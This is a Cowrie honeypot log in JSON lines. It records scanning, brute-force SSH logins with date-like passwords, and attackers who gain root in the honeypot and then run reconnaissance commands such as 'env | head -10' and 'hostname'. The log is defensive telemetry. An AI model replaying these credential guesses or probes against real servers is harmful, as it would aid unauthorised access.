{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\x9b\\xea\u001b\u017d\\xc4R\\xf1\\xac=\\x98\u0015\\xc2\\xc8s\u0012&\\x9f`/\\xfc\u65feR\\x82\u0010\\xa6\\xf5\\xac`9\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\x9b\\xea\u001b\u017d\\xc4R\\xf1\\xac=\\x98\u0015\\xc2\\xc8s\u0012&\\x9f`/\\xfc\u65feR\\x82\u0010\\xa6\\xf5\\xac`9\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-08-28T22:46:16.734129Z","src_ip":"3.149.59.26","session":"072fe208d683"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:46:16.735026Z","src_ip":"3.149.59.26","session":"072fe208d683"}
{"eventid":"cowrie.session.connect","src_ip":"3.149.59.26","src_port":53456,"dst_ip":"1.2.3.4","dst_port":22,"session":"adcf8fb44810","protocol":"ssh","message":"New connection: 3.149.59.26:53456 (1.2.3.4:22) [session: adcf8fb44810]","sensor":"my-vps","timestamp":"2025-08-28T22:46:20.743552Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-28T22:46:20.744553Z","src_ip":"3.149.59.26","session":"adcf8fb44810"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:46:20.745565Z","src_ip":"3.149.59.26","session":"adcf8fb44810"}
{"eventid":"cowrie.session.connect","src_ip":"3.149.59.26","src_port":36642,"dst_ip":"1.2.3.4","dst_port":22,"session":"885047d10a53","protocol":"ssh","message":"New connection: 3.149.59.26:36642 (1.2.3.4:22) [session: 885047d10a53]","sensor":"my-vps","timestamp":"2025-08-28T22:46:25.765995Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xfe\\xd8m\\xed\u001eIs\\xcd\u000f\\xfc","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xfe\\xd8m\\xed\u001eIs\\xcd\u000f\\xfc","sensor":"my-vps","timestamp":"2025-08-28T22:46:25.767274Z","src_ip":"3.149.59.26","session":"885047d10a53"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:46:25.768363Z","src_ip":"3.149.59.26","session":"885047d10a53"}
{"eventid":"cowrie.session.connect","src_ip":"3.149.59.26","src_port":36660,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba451527bc08","protocol":"ssh","message":"New connection: 3.149.59.26:36660 (1.2.3.4:22) [session: ba451527bc08]","sensor":"my-vps","timestamp":"2025-08-28T22:46:27.656446Z"}
{"eventid":"cowrie.client.version","version":"","message":"Remote SSH version: ","sensor":"my-vps","timestamp":"2025-08-28T22:46:27.657434Z","src_ip":"3.149.59.26","session":"ba451527bc08"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:46:27.658524Z","src_ip":"3.149.59.26","session":"ba451527bc08"}
{"eventid":"cowrie.session.connect","src_ip":"3.149.59.26","src_port":59100,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c9811eaf1ef","protocol":"ssh","message":"New connection: 3.149.59.26:59100 (1.2.3.4:22) [session: 5c9811eaf1ef]","sensor":"my-vps","timestamp":"2025-08-28T22:46:51.168412Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:46:51.169092Z","src_ip":"3.149.59.26","session":"5c9811eaf1ef"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T22:46:51.305607Z","src_ip":"3.149.59.26","session":"5c9811eaf1ef"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:47:01.168349Z","src_ip":"3.149.59.26","session":"5c9811eaf1ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":26981,"dst_ip":"1.2.3.4","dst_port":22,"session":"b73994b52660","protocol":"ssh","message":"New connection: 212.227.125.160:26981 (1.2.3.4:22) [session: b73994b52660]","sensor":"my-vps","timestamp":"2025-08-28T22:47:03.195668Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T22:47:03.197502Z","src_ip":"212.227.125.160","session":"b73994b52660"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T22:47:03.257869Z","src_ip":"212.227.125.160","session":"b73994b52660"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25101984","message":"login attempt [admin/25101984] failed","sensor":"my-vps","timestamp":"2025-08-28T22:47:03.578211Z","src_ip":"212.227.125.160","session":"b73994b52660"}
{"eventid":"cowrie.login.failed","username":"admin","password":"250486","message":"login attempt [admin/250486] failed","sensor":"my-vps","timestamp":"2025-08-28T22:47:04.641019Z","src_ip":"212.227.125.160","session":"b73994b52660"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25041982","message":"login attempt [admin/25041982] failed","sensor":"my-vps","timestamp":"2025-08-28T22:47:05.703981Z","src_ip":"212.227.125.160","session":"b73994b52660"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25041981","message":"login attempt [admin/25041981] failed","sensor":"my-vps","timestamp":"2025-08-28T22:47:06.766379Z","src_ip":"212.227.125.160","session":"b73994b52660"}
{"eventid":"cowrie.login.failed","username":"admin","password":"25041977","message":"login attempt [admin/25041977] failed","sensor":"my-vps","timestamp":"2025-08-28T22:47:07.829045Z","src_ip":"212.227.125.160","session":"b73994b52660"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:47:08.890929Z","src_ip":"212.227.125.160","session":"b73994b52660"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52990,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfefc44fc95e","protocol":"ssh","message":"New connection: 212.227.125.160:52990 (1.2.3.4:22) [session: bfefc44fc95e]","sensor":"my-vps","timestamp":"2025-08-28T22:47:20.535016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:47:21.856443Z","src_ip":"212.227.125.160","session":"bfefc44fc95e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:47:21.857190Z","src_ip":"212.227.125.160","session":"bfefc44fc95e"}
{"eventid":"cowrie.login.success","username":"root","password":"NULL","message":"login attempt [root/NULL] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:47:27.384347Z","src_ip":"212.227.125.160","session":"bfefc44fc95e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:47:30.785162Z","src_ip":"212.227.125.160","session":"bfefc44fc95e"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T22:47:30.785887Z","src_ip":"212.227.125.160","session":"bfefc44fc95e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:47:32.268848Z","src_ip":"212.227.125.160","session":"bfefc44fc95e"}
{"eventid":"cowrie.session.closed","duration":"11.7","message":"Connection lost after 11.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:47:32.270029Z","src_ip":"212.227.125.160","session":"bfefc44fc95e"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":50322,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a6ba651de52","protocol":"ssh","message":"New connection: 201.148.180.50:50322 (1.2.3.4:22) [session: 0a6ba651de52]","sensor":"my-vps","timestamp":"2025-08-28T22:47:39.340113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:47:40.110636Z","src_ip":"201.148.180.50","session":"0a6ba651de52"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:47:40.111360Z","src_ip":"201.148.180.50","session":"0a6ba651de52"}
{"eventid":"cowrie.login.success","username":"root","password":"NULL","message":"login attempt [root/NULL] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:47:45.269889Z","src_ip":"201.148.180.50","session":"0a6ba651de52"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:47:55.047074Z","src_ip":"201.148.180.50","session":"0a6ba651de52"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-28T22:47:55.047829Z","src_ip":"201.148.180.50","session":"0a6ba651de52"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:47:56.473025Z","src_ip":"201.148.180.50","session":"0a6ba651de52"}
{"eventid":"cowrie.session.closed","duration":"17.1","message":"Connection lost after 17.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:47:56.474262Z","src_ip":"201.148.180.50","session":"0a6ba651de52"}
{"eventid":"cowrie.session.connect","src_ip":"164.92.210.70","src_port":6102,"dst_ip":"1.2.3.4","dst_port":22,"session":"b854d9755ae0","protocol":"ssh","message":"New connection: 164.92.210.70:6102 (1.2.3.4:22) [session: b854d9755ae0]","sensor":"my-vps","timestamp":"2025-08-28T22:48:20.242962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-08-28T22:48:20.264982Z","src_ip":"164.92.210.70","session":"b854d9755ae0"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T22:48:20.297248Z","src_ip":"164.92.210.70","session":"b854d9755ae0"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-08-28T22:48:20.325531Z","src_ip":"164.92.210.70","session":"b854d9755ae0"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:48:20.327155Z","src_ip":"164.92.210.70","session":"b854d9755ae0"}
{"eventid":"cowrie.session.connect","src_ip":"122.8.184.49","src_port":48412,"dst_ip":"1.2.3.4","dst_port":23,"session":"8cff9b42729c","protocol":"telnet","message":"New connection: 122.8.184.49:48412 (1.2.3.4:23) [session: 8cff9b42729c]","sensor":"my-vps","timestamp":"2025-08-28T22:48:59.479109Z"}
{"eventid":"cowrie.session.closed","duration":30.613389015197754,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:49:30.092428Z","src_ip":"122.8.184.49","session":"8cff9b42729c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36876,"dst_ip":"1.2.3.4","dst_port":23,"session":"adf3a0a381e4","protocol":"telnet","message":"New connection: 212.227.235.229:36876 (1.2.3.4:23) [session: adf3a0a381e4]","sensor":"my-vps","timestamp":"2025-08-28T22:49:31.147530Z"}
{"eventid":"cowrie.session.closed","duration":0.0012464523315429688,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:49:31.148702Z","src_ip":"212.227.235.229","session":"adf3a0a381e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56097,"dst_ip":"1.2.3.4","dst_port":22,"session":"96db9e5e650c","protocol":"ssh","message":"New connection: 212.227.235.229:56097 (1.2.3.4:22) [session: 96db9e5e650c]","sensor":"my-vps","timestamp":"2025-08-28T22:49:37.484044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:49:37.485007Z","src_ip":"212.227.235.229","session":"96db9e5e650c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:49:37.757604Z","src_ip":"212.227.235.229","session":"96db9e5e650c"}
{"eventid":"cowrie.login.success","username":"root","password":"11021986v","message":"login attempt [root/11021986v] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:49:38.578132Z","src_ip":"212.227.235.229","session":"96db9e5e650c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:49:39.140701Z","src_ip":"212.227.235.229","session":"96db9e5e650c"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-28T22:49:39.141607Z","src_ip":"212.227.235.229","session":"96db9e5e650c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:49:39.421471Z","src_ip":"212.227.235.229","session":"96db9e5e650c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:49:39.422698Z","src_ip":"212.227.235.229","session":"96db9e5e650c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50588,"dst_ip":"1.2.3.4","dst_port":22,"session":"e80cda10aa29","protocol":"ssh","message":"New connection: 217.72.205.35:50588 (1.2.3.4:22) [session: e80cda10aa29]","sensor":"my-vps","timestamp":"2025-08-28T22:49:56.202981Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:49:56.204151Z","src_ip":"217.72.205.35","session":"e80cda10aa29"}
{"eventid":"cowrie.session.connect","src_ip":"77.90.185.47","src_port":40092,"dst_ip":"1.2.3.4","dst_port":22,"session":"65ef0a141f90","protocol":"ssh","message":"New connection: 77.90.185.47:40092 (1.2.3.4:22) [session: 65ef0a141f90]","sensor":"my-vps","timestamp":"2025-08-28T22:49:57.144539Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:49:57.268163Z","src_ip":"77.90.185.47","session":"65ef0a141f90"}
